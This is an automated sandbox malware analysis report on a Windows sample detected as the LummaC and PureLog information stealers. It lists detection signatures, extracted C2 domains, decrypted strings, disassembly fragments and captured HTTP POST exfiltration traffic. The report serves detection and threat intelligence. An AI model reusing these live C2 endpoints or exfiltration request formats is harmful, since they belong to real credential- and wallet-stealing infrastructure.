Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EZsrFTi.exe

Overview

General Information

Sample name:EZsrFTi.exe
Analysis ID:1592068
MD5:c0a15c8328d0eb6c48c194ca52787560
SHA1:79c65b0b78d7d28729e3ece99e888ca3acdd47e7
SHA256:cf6e4051d20e654347161dc77b59840a6270cad5e63b4a59a59148c37e776f99
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EZsrFTi.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)
    • EZsrFTi.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)
    • EZsrFTi.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)
    • EZsrFTi.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)
    • WerFault.exe (PID: 7824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["immolatechallen.bond", "sobrattyeu.bond", "jarry-fixxer.bond", "strivehelpeu.bond", "crookedfoshe.bond", "growthselec.bond", "pain-temper.bond", "stripedre-lot.bond", "jarry-deatile.bond"], "Build id": "yau6Na--7329910690"}
SourceRuleDescriptionAuthorStrings
EZsrFTi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Process Memory Space: EZsrFTi.exe PID: 7732JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              Process Memory Space: EZsrFTi.exe PID: 7732JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                  SourceRuleDescriptionAuthorStrings
                  0.0.EZsrFTi.exe.620000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.EZsrFTi.exe.39e9550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.EZsrFTi.exe.39e9550.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-15T18:11:05.442760+010020283713Unknown Traffic192.168.2.1149707104.21.64.1443TCP
                        2025-01-15T18:11:06.693913+010020283713Unknown Traffic192.168.2.1149708104.21.64.1443TCP
                        2025-01-15T18:11:08.156911+010020283713Unknown Traffic192.168.2.1149710104.21.64.1443TCP
                        2025-01-15T18:11:09.451195+010020283713Unknown Traffic192.168.2.1149715104.21.64.1443TCP
                        2025-01-15T18:11:10.735748+010020283713Unknown Traffic192.168.2.1149727104.21.64.1443TCP
                        2025-01-15T18:11:12.853049+010020283713Unknown Traffic192.168.2.1149742104.21.64.1443TCP
                        2025-01-15T18:11:14.284231+010020283713Unknown Traffic192.168.2.1149750104.21.64.1443TCP
                        2025-01-15T18:11:16.693086+010020283713Unknown Traffic192.168.2.1149769104.21.64.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-15T18:11:05.949857+010020546531A Network Trojan was detected192.168.2.1149707104.21.64.1443TCP
                        2025-01-15T18:11:07.501941+010020546531A Network Trojan was detected192.168.2.1149708104.21.64.1443TCP
                        2025-01-15T18:11:17.494241+010020546531A Network Trojan was detected192.168.2.1149769104.21.64.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-15T18:11:05.949857+010020498361A Network Trojan was detected192.168.2.1149707104.21.64.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-15T18:11:07.501941+010020498121A Network Trojan was detected192.168.2.1149708104.21.64.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-15T18:11:08.917043+010020480941Malware Command and Control Activity Detected192.168.2.1149710104.21.64.1443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["immolatechallen.bond", "sobrattyeu.bond", "jarry-fixxer.bond", "strivehelpeu.bond", "crookedfoshe.bond", "growthselec.bond", "pain-temper.bond", "stripedre-lot.bond", "jarry-deatile.bond"], "Build id": "yau6Na--7329910690"}
                        Source: EZsrFTi.exeVirustotal: Detection: 27%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
                        Source: EZsrFTi.exeJoe Sandbox ML: detected
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-fixxer.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: pain-temper.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-deatile.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: growthselec.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: stripedre-lot.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: immolatechallen.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: crookedfoshe.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: strivehelpeu.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: sobrattyeu.bond
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                        Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: yau6Na--7329910690
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004151D0 CryptUnprotectData,4_2_004151D0
                        Source: EZsrFTi.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49742 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49750 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49769 version: TLS 1.2
                        Source: EZsrFTi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.pdb$ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: Handler.pdb@\lqMZ@ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: Handler.pdbx source: EZsrFTi.exe
                        Source: Binary string: Handler.pdb source: EZsrFTi.exe, WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Windows.Forms.pdb\ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h4_2_00441230
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov esi, eax4_2_0043A2B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]4_2_00441310
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ecx, eax4_2_004243A0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+50h]4_2_004243A0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov edx, ecx4_2_00409BB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-0Fh]4_2_00409BB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov dword ptr [esp], esi4_2_00427520
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi-0AFF8E14h]4_2_004330F0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov word ptr [ecx], bx4_2_0041C09C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+159A831Ah]4_2_0042E8A9
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch4_2_004180AC
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000C1h]4_2_00440910
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]4_2_00440910
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+159A831Ah]4_2_0042E91D
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_0041812C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ebx, eax4_2_00405930
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ebp, eax4_2_00405930
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-597BE901h]4_2_004249D0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h4_2_0043D9D0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ecx, edx4_2_0040A9E0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h4_2_00417193
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000120h]4_2_00417193
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042B240
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ecx, eax4_2_0043EA02
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov dword ptr [esi+0Ch], edx4_2_0040B21B
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp word ptr [edi+esi+02h], 0000h4_2_0041BACA
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then add ecx, eax4_2_004272D8
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]4_2_00440AF0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ebx, bx4_2_004262F7
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ecx, eax4_2_0041A28A
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_0040CAB2
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov edi, eax4_2_00402B70
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then test esi, esi4_2_0043B300
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]4_2_00440BA0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax-7F9455FDh]4_2_0041A3B1
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov eax, FFFFFFFFh4_2_00414BBB
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0042DC65
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0000012Ch]4_2_0042EC6B
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [ecx+edi]4_2_0044046D
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h4_2_00426C74
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then lea eax, dword ptr [esp+4Ch]4_2_00426C74
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h4_2_0043ACEA
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407490
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407490
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edi, word ptr [edx]4_2_00425D67
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp word ptr [edi+esi+02h], 0000h4_2_0041BDC0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then not eax4_2_00417DC3
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ebx, bx4_2_004262F7
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0042D5AC
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-7B8B8D6Fh]4_2_00429665
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then jmp eax4_2_0042966F
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0041A60C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]4_2_00440ED0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov ecx, eax4_2_004096B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h4_2_0042C710
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0042EF3F
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0041A7F6
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000C1h]4_2_004407FD
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]4_2_004407FD
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov edx, ebx4_2_0043AF80
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]4_2_0043B789
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]4_2_0041E790
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_0043E7AE
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+54h]4_2_00420FB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4x nop then mov byte ptr [edi], al4_2_004167BD

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49707 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49707 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49708 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49708 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49769 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49710 -> 104.21.64.1:443
                        Source: Malware configuration extractorURLs: immolatechallen.bond
                        Source: Malware configuration extractorURLs: sobrattyeu.bond
                        Source: Malware configuration extractorURLs: jarry-fixxer.bond
                        Source: Malware configuration extractorURLs: strivehelpeu.bond
                        Source: Malware configuration extractorURLs: crookedfoshe.bond
                        Source: Malware configuration extractorURLs: growthselec.bond
                        Source: Malware configuration extractorURLs: pain-temper.bond
                        Source: Malware configuration extractorURLs: stripedre-lot.bond
                        Source: Malware configuration extractorURLs: jarry-deatile.bond
                        Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                        Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49710 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49708 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49742 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49769 -> 104.21.64.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49750 -> 104.21.64.1:443
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BF6DZ3JBI07BD1HUHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4QHHLDZZVBYITK5MH8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G7J5MQQ4QJR3QLITMQSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20439Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFG25ELB7RXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1343Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=13F9SI98ZYOYF9V467User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570166Host: sobrattyeu.bond
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sobrattyeu.bond
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: sobrattyeu.bond
                        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
                        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                        Source: EZsrFTi.exe, 00000004.00000002.2540265272.0000000003C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/
                        Source: EZsrFTi.exe, 00000004.00000002.2539470987.0000000001477000.00000004.00000020.00020000.00000000.sdmp, EZsrFTi.exe, 00000004.00000002.2539601482.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/api
                        Source: EZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/pi
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49727 version: TLS 1.2
